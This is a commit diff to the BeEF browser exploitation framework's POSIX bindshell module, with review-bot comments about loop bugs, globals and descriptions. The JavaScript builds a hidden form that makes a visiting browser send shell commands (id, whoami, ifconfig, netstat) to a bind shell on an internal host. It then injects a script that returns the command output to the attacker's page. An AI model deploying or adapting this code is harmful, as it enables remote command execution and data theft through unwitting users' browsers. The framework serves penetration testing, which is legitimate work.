Fixed IPEC POSIX module

git-svn-id: https://beef.googlecode.com/svn/trunk@1340 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
buherator@gmail.com
2011-10-02 12:39:16 +00:00
parent c015529f19
commit d0f0051878
2 changed files with 17 additions and 9 deletions


@@ -20,6 +20,7 @@ beef.execute(function() {
var cmd = '<%= @cmd %>';
var command_timeout = "<%= @command_timeout %>";
var internal_counter = 0;
var result_size = "<%= @result_size %>";
// create iframe
var iframe = document.createElement("iframe");
@@ -28,7 +29,7 @@ beef.execute(function() {
document.body.appendChild(iframe);
// send a request
function send_cmds(ip, port, cmd) {
function send_cmds(ip, port, cmd, size) {
var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh&&";
var parent = window.location.href;
@@ -45,16 +46,22 @@ beef.execute(function() {
myExt = document.createElement("INPUT");
myExt.setAttribute("id",<%= @command_id %>);
myExt.setAttribute("name",<%= @command_id %>);
myExt.setAttribute("value","echo \"</pre><div id='ipc_content'>\" & " + cmd + " & echo Directory Contents: & ls -la & ");
myExt.setAttribute("value","echo -e HTTP/1.1 200 OK\\\\r;echo -e Content-Type: text/html\\\\r;echo -e Content-Length: "+(34+cmd.length+52+parent.length+115+size*1)+"\\\\r;echo -e Keep-Alive: timeout=5,max=100\\\\r;echo -e Connection: keep-alive\\\\r;echo -e \\\\r;echo \"<html><body><div id='ipc_content'>\";(" + cmd + ")|head -c "+size+" ; ");
myform.appendChild(myExt);
// Adding puffer space for the command result
end_talkback=" echo -e \"__END_OF_POSIX_IPC<%= @command_id %>__</div><s"+"cript>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);</"+"script></body></html>";
while(--size) end_talkback+=" ";
end_talkback+="\" \\\\r ; exit";
// post js to call home and close connection
myExt = document.createElement("INPUT");
myExt.setAttribute("id","endTag");
myExt.setAttribute("name","</div>");
myExt.setAttribute("value","exit & echo \"__END_OF_POSIX_IPC<%= @command_id %>__</div><scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);</"+"script>\" & exit & exit & exit");
myExt2 = document.createElement("INPUT");
myExt2.setAttribute("id","endTag");
myExt2.setAttribute("name","</div>");
myExt2.setAttribute("value",end_talkback);
myform.appendChild(myExt);
myform.appendChild(myExt2);
myform.submit();
}
@@ -88,7 +95,7 @@ beef.execute(function() {
// send request and wait for reply
} else {
send_cmds(target_ip, target_port, cmd);
send_cmds(target_ip, target_port, cmd,result_size);
waituntilok();
}
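Review bot: The padding loop `while(--size) end_talkback+=" ";` in the third hunk does not terminate when `result_size` is 0 or negative, since `--size` steps below zero and stays truthy, so the page running the script locks up; `size` also arrives as a template-rendered string, and a non-numeric value turns the Content-Length expression into NaN. Normalise it once at the top of `send_cmds`, `size = parseInt(size, 10); if (!(size > 0)) return;`, and pad with a counted loop, `for (var i = 1; i < size; i++) end_talkback += " ";`. `end_talkback` and `myExt2` are assigned without `var` and become globals. The constants 34, 52 and 115 in the length sum have no comment saying which fragments they count. `send_cmds` opens in the second hunk and the enclosing `beef.execute` callback extends beyond the visible hunks.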


@@ -61,7 +61,8 @@ class Inter_protocol_posix_bindshell < BeEF::Core::Command
{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo HostName: & hostname & ifconfig & netstat -an', 'width'=>'200px' }
{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type'=>'textarea', 'value'=>'echo ID: ; id', 'width'=>'200px' },
{'name'=>'result_size', 'ui_label'=>'Result Size', 'description'=>'Expected maximum size of the result in bytes','value'=>'1024'}
]
end
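Review bot: The new `result_size` description reads as an estimate, but the JavaScript side pipes the command through `head -c` with this value, so any output beyond it is cut off; the text shown to the operator should say that, e.g. `'description'=>'Maximum result size in bytes; longer output is truncated'`. The rewritten `cmd` description also carries over the misspelling `seperate`. The options array and the method that returns it start above this hunk.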